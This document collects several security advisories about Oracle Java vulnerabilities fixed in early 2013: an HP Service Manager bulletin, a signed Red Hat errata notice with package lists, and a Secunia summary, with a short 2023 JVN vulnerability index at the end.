10.0 CVE-2012-4301 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2012-4305 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3 CVE-2013-0169 (AV:N/AC:H/Au:N/C:P/I:N/A:N) 2.6 CVE-2013-0351 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2013-0409 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0 CVE-2013-0419 (AV:N/AC:H/Au:N/C:C/I:C/A:C) 7.6 CVE-2013-0423 (AV:N/AC:H/Au:N/C:C/I:C/A:C) 7.6 CVE-2013-0424 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0 CVE-2013-0425 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2013-0426 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2013-0427 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0 CVE-2013-0428 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2013-0429 (AV:N/AC:H/Au:N/C:C/I:C/A:C) 7.6 CVE-2013-0430 (AV:L/AC:M/Au:N/C:C/I:C/A:C) 6.9 CVE-2013-0431 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0 CVE-2013-0432 (AV:N/AC:L/Au:N/C:P/I:P/A:N) 6.4 CVE-2013-0433 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0 CVE-2013-0434 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0 CVE-2013-0435 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0 CVE-2013-0436 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2013-0437 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2013-0438 (AV:N/AC:M/Au:N/C:P/I:N/A:N) 4.3 CVE-2013-0439 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2013-0440 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2013-0441 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2013-0442 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2013-0443 (AV:N/AC:H/Au:N/C:P/I:P/A:N) 4.0 CVE-2013-0444 (AV:N/AC:H/Au:N/C:C/I:C/A:C) 7.6 CVE-2013-0445 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2013-0446 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2013-0447 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2013-0448 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0 CVE-2013-0449 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0 CVE-2013-0450 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2013-1472 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2013-1473 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0 CVE-2013-1474 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3 CVE-2013-1475 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2013-1476 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2013-1477 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2013-1478 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2013-1479 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2013-1480 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2013-1481 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2013-1482 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2013-1483 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2013-1484 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2013-1485 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0 CVE-2013-1486 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2013-1487 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2013-1489 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 =========================================================== Information on CVSS is documented in HP Customer Notice: HPSN-2008-002 RESOLUTION HP has provided an update for Service Manager that updates the JRE to the latest version, thus eliminating known JRE7-related security vulnerabilities. Download and install the updates from The HP Software Support Online (SSO). SM 9.31P2 Server Windows Server 9.31.2004 p2 http://support.openview.hp.com/selfsolve/document/FID/DOCUMENTUM_HPSM_00423 HP Itanium Server 9.31.2004 p2 http://support.openview.hp.com/selfsolve/document/FID/DOCUMENTUM_HPSM_00420 Linux Server 9.31.2004 p2 http://support.openview.hp.com/selfsolve/document/FID/DOCUMENTUM_HPSM_00421 Solaris Server 9.31.2004 p2 http://support.openview.hp.com/selfsolve/document/FID/DOCUMENTUM_HPSM_00422 AIX Server 9.31.2004 p2 http://support.openview.hp.com/selfsolve/document/FID/DOCUMENTUM_HPSM_00419 SM 9.31P2 Web Tier Web Tier 9.31.2004 p2 http://support.openview.hp.com/selfsolve/document/FID/DOCUMENTUM_HPSM_00424 SM 9.31P2 Windows Client Windows Client 9.31.2004 p2 http://support.openview.hp.com/selfsolve/document/FID/DOCUMENTUM_HPSM_00425 SM 9.31P2 Knowledge Management SM 9.31P2 Knowledge Management http://support.openview.hp.com/selfsolve/document/FID/DOCUMENTUM_HPSM_00426 HISTORY Version:1 (rev.1) - 29 April 2013 Initial release Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy. Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HP Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-alert@hp.com. Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com Subscribe: To initiate a subscription to receive future HP Security Bulletin alerts via Email: http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins Security Bulletin List: A list of HP Security Bulletins, updated periodically, is contained in HP Security Notice HPSN-2011-001: https://h20566.www2.hp.com/portal/site/hpsc/public/kb/ docDisplay?docId=emr_na-c02964430 Security Bulletin Archive: A list of recently released Security Bulletins is available here: http://h20566.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/ Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB. 3C = 3COM 3P = 3rd Party Software GN = HP General Software HF = HP Hardware and Firmware MP = MPE/iX MU = Multi-Platform Software NS = NonStop Servers OV = OpenVMS PI = Printing and Imaging PV = ProCurve ST = Storage Software TU = Tru64 UNIX UX = HP-UX Copyright 2013 Hewlett-Packard Development Company, L.P. Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits;damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ===================================================================== Red Hat Security Advisory Synopsis: Critical: java-1.6.0-sun security update Advisory ID: RHSA-2013:0236-01 Product: Red Hat Enterprise Linux Extras Advisory URL: https://rhn.redhat.com/errata/RHSA-2013-0236.html Issue date: 2013-02-04 CVE Names: CVE-2012-1541 CVE-2012-3213 CVE-2012-3342 CVE-2013-0351 CVE-2013-0409 CVE-2013-0419 CVE-2013-0423 CVE-2013-0424 CVE-2013-0425 CVE-2013-0426 CVE-2013-0427 CVE-2013-0428 CVE-2013-0429 CVE-2013-0430 CVE-2013-0432 CVE-2013-0433 CVE-2013-0434 CVE-2013-0435 CVE-2013-0438 CVE-2013-0440 CVE-2013-0441 CVE-2013-0442 CVE-2013-0443 CVE-2013-0445 CVE-2013-0446 CVE-2013-0450 CVE-2013-1473 CVE-2013-1475 CVE-2013-1476 CVE-2013-1478 CVE-2013-1480 CVE-2013-1481 ===================================================================== 1. Summary: Updated java-1.6.0-sun packages that fix several security issues are now available for Red Hat Enterprise Linux 5 and 6 Supplementary. The Red Hat Security Response Team has rated this update as having critical security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section. 2. Relevant releases/architectures: Red Hat Enterprise Linux Desktop Supplementary (v. 5) - i386, x86_64 Red Hat Enterprise Linux Desktop Supplementary (v. 6) - i386, x86_64 Red Hat Enterprise Linux HPC Node Supplementary (v. 6) - x86_64 Red Hat Enterprise Linux Server Supplementary (v. 5) - i386, x86_64 Red Hat Enterprise Linux Server Supplementary (v. 6) - i386, x86_64 Red Hat Enterprise Linux Workstation Supplementary (v. 6) - i386, x86_64 3. (CVE-2012-1541, CVE-2012-3213, CVE-2012-3342, CVE-2013-0351, CVE-2013-0409, CVE-2013-0419, CVE-2013-0423, CVE-2013-0424, CVE-2013-0425, CVE-2013-0426, CVE-2013-0427, CVE-2013-0428, CVE-2013-0429, CVE-2013-0430, CVE-2013-0432, CVE-2013-0433, CVE-2013-0434, CVE-2013-0435, CVE-2013-0438, CVE-2013-0440, CVE-2013-0441, CVE-2013-0442, CVE-2013-0443, CVE-2013-0445, CVE-2013-0446, CVE-2013-0450, CVE-2013-1473, CVE-2013-1475, CVE-2013-1476, CVE-2013-1478, CVE-2013-1480, CVE-2013-1481) All users of java-1.6.0-sun are advised to upgrade to these updated packages, which provide Oracle Java 6 Update 39. All running instances of Oracle Java must be restarted for the update to take effect. 4. Solution: Before applying this update, make sure all previously-released errata relevant to your system have been applied. This update is available via the Red Hat Network. Details on how to use the Red Hat Network to apply this update are available at https://access.redhat.com/knowledge/articles/11258 5. Bugs fixed (http://bugzilla.redhat.com/): 859140 - CVE-2013-0440 OpenJDK: CPU consumption DoS via repeated SSL ClientHello packets (JSSE, 7192393) 860652 - CVE-2013-1475 OpenJDK: IIOP type reuse sandbox bypass (CORBA, 8000540, SE-2012-01 Issue 50) 906813 - CVE-2013-0424 OpenJDK: RMI CGIHandler XSS issue (RMI, 6563318) 906892 - CVE-2013-0435 OpenJDK: com.sun.xml.internal.* not restricted packages (JAX-WS, 7201068) 906894 - CVE-2013-1478 OpenJDK: image parser insufficient raster parameter checks (2D, 8001972) 906899 - CVE-2013-0442 OpenJDK: insufficient privilege checking issue (AWT, 7192977) 906900 - CVE-2013-0445 OpenJDK: insufficient privilege checking issue (AWT, 8001057) 906904 - CVE-2013-1480 OpenJDK: image parser insufficient raster parameter checks (AWT, 8002325) 906911 - CVE-2013-0450 OpenJDK: RequiredModelMBean missing access control context checks (JMX, 8000537) 906914 - CVE-2012-1541 Oracle JDK: unspecified vulnerability fixed in 6u39 and 7u13 (Deployment) 906916 - CVE-2013-0446 Oracle JDK: unspecified vulnerability fixed in 6u39 and 7u13 (Deployment) 906917 - CVE-2012-3342 Oracle JDK: unspecified vulnerability fixed in 6u39 and 7u13 (Deployment) 906918 - CVE-2013-0419 Oracle JDK: unspecified vulnerability fixed in 6u39 and 7u13 (Deployment) 906921 - CVE-2013-0423 Oracle JDK: unspecified vulnerability fixed in 6u39 and 7u13 (Deployment) 906923 - CVE-2013-0351 Oracle JDK: unspecified vulnerability fixed in 6u39 and 7u13 (Deployment) 906930 - CVE-2013-0430 Oracle JDK: unspecified vulnerability fixed in 6u39 and 7u13 (Install) 906933 - CVE-2013-1473 Oracle JDK: unspecified vulnerability fixed in 6u39 and 7u13 (Deployment) 906935 - CVE-2013-0438 Oracle JDK: unspecified vulnerability fixed in 6u39 and 7u13 (Deployment) 907207 - CVE-2013-0428 OpenJDK: reflection API incorrect checks for proxy classes (Libraries, 7197546, SE-2012-01 Issue 29) 907219 - CVE-2013-0432 OpenJDK: insufficient clipboard access premission checks (AWT, 7186952) 907223 - CVE-2012-3213 Oracle JDK: unspecified vulnerability fixed in 6u39 and 7u13 (Scripting) 907224 - CVE-2013-1481 Oracle JDK: unspecified vulnerability fixed in 6u39 (Sound) 907226 - CVE-2013-0409 Oracle JDK: unspecified vulnerability fixed in 6u39 and 7u13 (JMX) 907340 - CVE-2013-0443 OpenJDK: insufficient Diffie-Hellman public key checks (JSSE, 7192392) 907344 - CVE-2013-0425 OpenJDK: logging insufficient access control checks (Libraries, 6664509) 907346 - CVE-2013-0426 OpenJDK: logging insufficient access control checks (Libraries, 6664528) 907453 - CVE-2013-0434 OpenJDK: loadPropertyFile missing restrictions (JAXP, 8001235) 907455 - CVE-2013-0427 OpenJDK: invalid threads subject to interrupts (Libraries, 6776941) 907456 - CVE-2013-0433 OpenJDK: InetSocketAddress serialization issue (Networking, 7201071) 907457 - CVE-2013-1476 OpenJDK: missing ValueHandlerImpl class constructor access restriction (CORBA, 8000631) 907458 - CVE-2013-0441 OpenJDK: missing serialization restriction (CORBA, 7201066) 907460 - CVE-2013-0429 OpenJDK: PresentationManager incorrectly shared (CORBA, 7141694) 6. Package List: Red Hat Enterprise Linux Desktop Supplementary (v. 5): i386: java-1.6.0-sun-1.6.0.39-1jpp.4.el5_9.i586.rpm java-1.6.0-sun-demo-1.6.0.39-1jpp.4.el5_9.i586.rpm java-1.6.0-sun-devel-1.6.0.39-1jpp.4.el5_9.i586.rpm java-1.6.0-sun-jdbc-1.6.0.39-1jpp.4.el5_9.i586.rpm java-1.6.0-sun-plugin-1.6.0.39-1jpp.4.el5_9.i586.rpm java-1.6.0-sun-src-1.6.0.39-1jpp.4.el5_9.i586.rpm x86_64: java-1.6.0-sun-1.6.0.39-1jpp.4.el5_9.i586.rpm java-1.6.0-sun-1.6.0.39-1jpp.4.el5_9.x86_64.rpm java-1.6.0-sun-demo-1.6.0.39-1jpp.4.el5_9.i586.rpm java-1.6.0-sun-demo-1.6.0.39-1jpp.4.el5_9.x86_64.rpm java-1.6.0-sun-devel-1.6.0.39-1jpp.4.el5_9.i586.rpm java-1.6.0-sun-devel-1.6.0.39-1jpp.4.el5_9.x86_64.rpm java-1.6.0-sun-jdbc-1.6.0.39-1jpp.4.el5_9.i586.rpm java-1.6.0-sun-jdbc-1.6.0.39-1jpp.4.el5_9.x86_64.rpm java-1.6.0-sun-plugin-1.6.0.39-1jpp.4.el5_9.i586.rpm java-1.6.0-sun-plugin-1.6.0.39-1jpp.4.el5_9.x86_64.rpm java-1.6.0-sun-src-1.6.0.39-1jpp.4.el5_9.i586.rpm java-1.6.0-sun-src-1.6.0.39-1jpp.4.el5_9.x86_64.rpm Red Hat Enterprise Linux Server Supplementary (v. 5): i386: java-1.6.0-sun-1.6.0.39-1jpp.4.el5_9.i586.rpm java-1.6.0-sun-demo-1.6.0.39-1jpp.4.el5_9.i586.rpm java-1.6.0-sun-devel-1.6.0.39-1jpp.4.el5_9.i586.rpm java-1.6.0-sun-jdbc-1.6.0.39-1jpp.4.el5_9.i586.rpm java-1.6.0-sun-plugin-1.6.0.39-1jpp.4.el5_9.i586.rpm java-1.6.0-sun-src-1.6.0.39-1jpp.4.el5_9.i586.rpm x86_64: java-1.6.0-sun-1.6.0.39-1jpp.4.el5_9.i586.rpm java-1.6.0-sun-1.6.0.39-1jpp.4.el5_9.x86_64.rpm java-1.6.0-sun-demo-1.6.0.39-1jpp.4.el5_9.i586.rpm java-1.6.0-sun-demo-1.6.0.39-1jpp.4.el5_9.x86_64.rpm java-1.6.0-sun-devel-1.6.0.39-1jpp.4.el5_9.i586.rpm java-1.6.0-sun-devel-1.6.0.39-1jpp.4.el5_9.x86_64.rpm java-1.6.0-sun-jdbc-1.6.0.39-1jpp.4.el5_9.i586.rpm java-1.6.0-sun-jdbc-1.6.0.39-1jpp.4.el5_9.x86_64.rpm java-1.6.0-sun-plugin-1.6.0.39-1jpp.4.el5_9.i586.rpm java-1.6.0-sun-plugin-1.6.0.39-1jpp.4.el5_9.x86_64.rpm java-1.6.0-sun-src-1.6.0.39-1jpp.4.el5_9.i586.rpm java-1.6.0-sun-src-1.6.0.39-1jpp.4.el5_9.x86_64.rpm Red Hat Enterprise Linux Desktop Supplementary (v. 6): i386: java-1.6.0-sun-1.6.0.39-1jpp.1.el6_3.i686.rpm java-1.6.0-sun-demo-1.6.0.39-1jpp.1.el6_3.i686.rpm java-1.6.0-sun-devel-1.6.0.39-1jpp.1.el6_3.i686.rpm java-1.6.0-sun-jdbc-1.6.0.39-1jpp.1.el6_3.i686.rpm java-1.6.0-sun-plugin-1.6.0.39-1jpp.1.el6_3.i686.rpm java-1.6.0-sun-src-1.6.0.39-1jpp.1.el6_3.i686.rpm x86_64: java-1.6.0-sun-1.6.0.39-1jpp.1.el6_3.i686.rpm java-1.6.0-sun-1.6.0.39-1jpp.1.el6_3.x86_64.rpm java-1.6.0-sun-demo-1.6.0.39-1jpp.1.el6_3.x86_64.rpm java-1.6.0-sun-devel-1.6.0.39-1jpp.1.el6_3.i686.rpm java-1.6.0-sun-devel-1.6.0.39-1jpp.1.el6_3.x86_64.rpm java-1.6.0-sun-jdbc-1.6.0.39-1jpp.1.el6_3.x86_64.rpm java-1.6.0-sun-plugin-1.6.0.39-1jpp.1.el6_3.x86_64.rpm java-1.6.0-sun-src-1.6.0.39-1jpp.1.el6_3.x86_64.rpm Red Hat Enterprise Linux HPC Node Supplementary (v. 6): x86_64: java-1.6.0-sun-1.6.0.39-1jpp.1.el6_3.i686.rpm java-1.6.0-sun-1.6.0.39-1jpp.1.el6_3.x86_64.rpm java-1.6.0-sun-demo-1.6.0.39-1jpp.1.el6_3.x86_64.rpm java-1.6.0-sun-devel-1.6.0.39-1jpp.1.el6_3.i686.rpm java-1.6.0-sun-devel-1.6.0.39-1jpp.1.el6_3.x86_64.rpm java-1.6.0-sun-src-1.6.0.39-1jpp.1.el6_3.x86_64.rpm Red Hat Enterprise Linux Server Supplementary (v. 6): i386: java-1.6.0-sun-1.6.0.39-1jpp.1.el6_3.i686.rpm java-1.6.0-sun-demo-1.6.0.39-1jpp.1.el6_3.i686.rpm java-1.6.0-sun-devel-1.6.0.39-1jpp.1.el6_3.i686.rpm java-1.6.0-sun-jdbc-1.6.0.39-1jpp.1.el6_3.i686.rpm java-1.6.0-sun-plugin-1.6.0.39-1jpp.1.el6_3.i686.rpm java-1.6.0-sun-src-1.6.0.39-1jpp.1.el6_3.i686.rpm x86_64: java-1.6.0-sun-1.6.0.39-1jpp.1.el6_3.i686.rpm java-1.6.0-sun-1.6.0.39-1jpp.1.el6_3.x86_64.rpm java-1.6.0-sun-demo-1.6.0.39-1jpp.1.el6_3.x86_64.rpm java-1.6.0-sun-devel-1.6.0.39-1jpp.1.el6_3.i686.rpm java-1.6.0-sun-devel-1.6.0.39-1jpp.1.el6_3.x86_64.rpm java-1.6.0-sun-jdbc-1.6.0.39-1jpp.1.el6_3.x86_64.rpm java-1.6.0-sun-plugin-1.6.0.39-1jpp.1.el6_3.x86_64.rpm java-1.6.0-sun-src-1.6.0.39-1jpp.1.el6_3.x86_64.rpm Red Hat Enterprise Linux Workstation Supplementary (v. 6): i386: java-1.6.0-sun-1.6.0.39-1jpp.1.el6_3.i686.rpm java-1.6.0-sun-demo-1.6.0.39-1jpp.1.el6_3.i686.rpm java-1.6.0-sun-devel-1.6.0.39-1jpp.1.el6_3.i686.rpm java-1.6.0-sun-jdbc-1.6.0.39-1jpp.1.el6_3.i686.rpm java-1.6.0-sun-plugin-1.6.0.39-1jpp.1.el6_3.i686.rpm java-1.6.0-sun-src-1.6.0.39-1jpp.1.el6_3.i686.rpm x86_64: java-1.6.0-sun-1.6.0.39-1jpp.1.el6_3.i686.rpm java-1.6.0-sun-1.6.0.39-1jpp.1.el6_3.x86_64.rpm java-1.6.0-sun-demo-1.6.0.39-1jpp.1.el6_3.x86_64.rpm java-1.6.0-sun-devel-1.6.0.39-1jpp.1.el6_3.i686.rpm java-1.6.0-sun-devel-1.6.0.39-1jpp.1.el6_3.x86_64.rpm java-1.6.0-sun-jdbc-1.6.0.39-1jpp.1.el6_3.x86_64.rpm java-1.6.0-sun-plugin-1.6.0.39-1jpp.1.el6_3.x86_64.rpm java-1.6.0-sun-src-1.6.0.39-1jpp.1.el6_3.x86_64.rpm These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/#package 7. References: https://www.redhat.com/security/data/cve/CVE-2012-1541.html https://www.redhat.com/security/data/cve/CVE-2012-3213.html https://www.redhat.com/security/data/cve/CVE-2012-3342.html https://www.redhat.com/security/data/cve/CVE-2013-0351.html https://www.redhat.com/security/data/cve/CVE-2013-0409.html https://www.redhat.com/security/data/cve/CVE-2013-0419.html https://www.redhat.com/security/data/cve/CVE-2013-0423.html https://www.redhat.com/security/data/cve/CVE-2013-0424.html https://www.redhat.com/security/data/cve/CVE-2013-0425.html https://www.redhat.com/security/data/cve/CVE-2013-0426.html https://www.redhat.com/security/data/cve/CVE-2013-0427.html https://www.redhat.com/security/data/cve/CVE-2013-0428.html https://www.redhat.com/security/data/cve/CVE-2013-0429.html https://www.redhat.com/security/data/cve/CVE-2013-0430.html https://www.redhat.com/security/data/cve/CVE-2013-0432.html https://www.redhat.com/security/data/cve/CVE-2013-0433.html https://www.redhat.com/security/data/cve/CVE-2013-0434.html https://www.redhat.com/security/data/cve/CVE-2013-0435.html https://www.redhat.com/security/data/cve/CVE-2013-0438.html https://www.redhat.com/security/data/cve/CVE-2013-0440.html https://www.redhat.com/security/data/cve/CVE-2013-0441.html https://www.redhat.com/security/data/cve/CVE-2013-0442.html https://www.redhat.com/security/data/cve/CVE-2013-0443.html https://www.redhat.com/security/data/cve/CVE-2013-0445.html https://www.redhat.com/security/data/cve/CVE-2013-0446.html https://www.redhat.com/security/data/cve/CVE-2013-0450.html https://www.redhat.com/security/data/cve/CVE-2013-1473.html https://www.redhat.com/security/data/cve/CVE-2013-1475.html https://www.redhat.com/security/data/cve/CVE-2013-1476.html https://www.redhat.com/security/data/cve/CVE-2013-1478.html https://www.redhat.com/security/data/cve/CVE-2013-1480.html https://www.redhat.com/security/data/cve/CVE-2013-1481.html https://access.redhat.com/security/updates/classification/#critical http://www.oracle.com/technetwork/topics/security/javacpufeb2013-1841061.html 8. Contact: The Red Hat security contact is <secalert@redhat.com>. More contact details at https://access.redhat.com/security/team/contact/ Copyright 2013 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.4 (GNU/Linux) iD8DBQFREE7WXlSAg2UNWIIRAuWTAJ4g2iIk0XnUEpbIXz6nDgDjaHxz7ACbBcjy gqkoqFew2BZDYA/n817qYO8= =m5pJ -----END PGP SIGNATURE----- -- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce . ---------------------------------------------------------------------- The final version of the CSI 6.0 has been released. Find out why this is not just another Patch Management solution: http://secunia.com/blog/325/ ---------------------------------------------------------------------- TITLE: Oracle Java Multiple Vulnerabilities SECUNIA ADVISORY ID: SA52064 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/52064/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=52064 RELEASE DATE: 2013-02-02 DISCUSS ADVISORY: http://secunia.com/advisories/52064/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/52064/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=52064 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: Multiple vulnerabilities have been reported in Oracle Java, which can be exploited by malicious local users to gain escalated privileges and by malicious people to disclose certain sensitive information, manipulate certain data, cause a DoS (Denial of Service), and compromise a vulnerable system. 1) An unspecified error in the 2D component of the client and server deployment can be exploited to potentially execute arbitrary code. 2) An unspecified error in the 2D component of the client and server deployment can be exploited to potentially execute arbitrary code. 3) An unspecified error in the AWT component of the client deployment can be exploited to potentially execute arbitrary code. 4) An unspecified error in the AWT component of the client deployment can be exploited to potentially execute arbitrary code. 5) An unspecified error in the AWT component of the client and server deployment can be exploited to potentially execute arbitrary code. 6) An unspecified error in the CORBA component of the client deployment can be exploited to potentially execute arbitrary code. 7) An unspecified error in the CORBA component of the client deployment can be exploited to potentially execute arbitrary code. 8) An unspecified error in the CORBA component of the client deployment can be exploited to potentially execute arbitrary code. 9) An unspecified error in the Deployment component of the client deployment can be exploited to potentially execute arbitrary code. 10) An unspecified error in the Deployment component of the client deployment can be exploited to potentially execute arbitrary code. 11) An unspecified error in the Deployment component of the client deployment can be exploited to potentially execute arbitrary code. 12) An unspecified error in the JMX component of the client deployment can be exploited to potentially execute arbitrary code. 13) An unspecified error in the JavaFX component of the client deployment can be exploited to potentially execute arbitrary code. 14) An unspecified error in the Libraries component of the client deployment can be exploited to potentially execute arbitrary code. 15) An unspecified error in the Libraries component of the client deployment can be exploited to potentially execute arbitrary code. 16) An unspecified error in the Libraries component of the client deployment can be exploited to potentially execute arbitrary code. 17) An unspecified error in the Scripting component of the client deployment can be exploited to potentially execute arbitrary code. 18) An unspecified error in the Sound component of the client deployment can be exploited to potentially execute arbitrary code. 19) An unspecified error in the Beans component of the client deployment can be exploited to potentially execute arbitrary code. 20) An unspecified error in the CORBA component of the client deployment can be exploited to potentially execute arbitrary code. 21) An unspecified error in the Deployment component of the client deployment can be exploited to potentially execute arbitrary code. 22) An unspecified error in the Deployment component of the client deployment can be exploited to potentially execute arbitrary code. 23) An unspecified error in the Deployment component of the client deployment can be exploited to disclose and manipulate certain data and cause a DoS. 24) An unspecified error in the Install component of the client deployment can be exploited by a local user to gain escalated privileges. 25) An unspecified error in the AWT component of the client deployment can be exploited to disclose and manipulate certain data. 26) An unspecified error in the Deployment component of the client deployment can be exploited to disclose certain data. 27) An unspecified error in the Deployment component of the client deployment can be exploited to manipulate certain data. 28) An unspecified error in the JAX-WS component of the client deployment can be exploited to disclose certain data. 29) An unspecified error in the JAXP component of the client deployment can be exploited to disclose certain data. 30) An unspecified error in the JMX component of the client deployment can be exploited to disclose certain data. 31) An unspecified error in the JMX component of the client deployment can be exploited to disclose certain data. 32) An unspecified error in the Libraries component of the client deployment can be exploited to manipulate certain data. 33) An unspecified error in the Libraries component of the client deployment can be exploited to manipulate certain data. 34) An unspecified error in the Networking component of the client deployment can be exploited to manipulate certain data. 35) An unspecified error in the RMI component of the client deployment can be exploited to manipulate certain data. 36) An unspecified error in the JSSE component of the server deployment can be exploited via SSL/TLS to cause a DoS. 37) An unspecified error in the Deployment component of the client deployment can be exploited to disclose certain data. 38) An unspecified error in the JSSE component of the client deployment can be exploited via SSL/TLS to disclose and manipulate certain data. The vulnerabilities are reported in the following products: * JDK and JRE 7 Update 11 and earlier. * JDK and JRE 6 Update 38 and earlier. * JDK and JRE 5.0 Update 38 and earlier. * SDK and JRE 1.4.2_40 and earlier. SOLUTION: Apply updates. Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ PROVIDED AND/OR DISCOVERED BY: One of the vulnerabilities is reported as a 0-day. It is currently unclear who reported the remaining vulnerabilities as the Oracle Jave SE Critical Patch Update for February 2013 only provides a bundled list of credits. This section will be updated when/if the original reporter provides more information. ORIGINAL ADVISORY: http://www.oracle.com/technetwork/topics/security/javacpufeb2013-1841061.html http://www.oracle.com/technetwork/topics/security/javacpufeb2013verbose-1841196.html OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXPLOIT: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------
Vulnerabilities are sorted by update time (recent to old).
ID Description Publish Date Update Date
jvndb-2023-004790 Multiple Vulnerabilities in Hitachi Infrastructure Analytics Advisor and Hitachi Ops Center Analyzer 2023-11-02T12:14+09:00 2023-11-02T12:14+09:00
jvndb-2023-004754 MCL Technologies MCL-Net vulnerable to directory traversal 2023-11-01T16:49+09:00 2023-11-01T16:49+09:00
jvndb-2020-000906 WL-Enq (WEB Enquete) vulnerable to cross-site scripting 2020-03-24T18:29+09:00 2023-10-30T17:52+09:00
jvndb-2023-000100 Scanning evasion issue in Cisco Secure Email Gateway 2023-10-16T16:11+09:00 2023-10-27T15:52+09:00
jvndb-2023-000103 HP ThinUpdate vulnerable to improper server certificate verification 2023-10-23T14:26+09:00 2023-10-23T14:26+09:00
jvndb-2023-003771 File and Directory Permissions Vulnerability in JP1/Performance Management 2023-10-04T15:23+09:00 2023-10-04T15:23+09:00
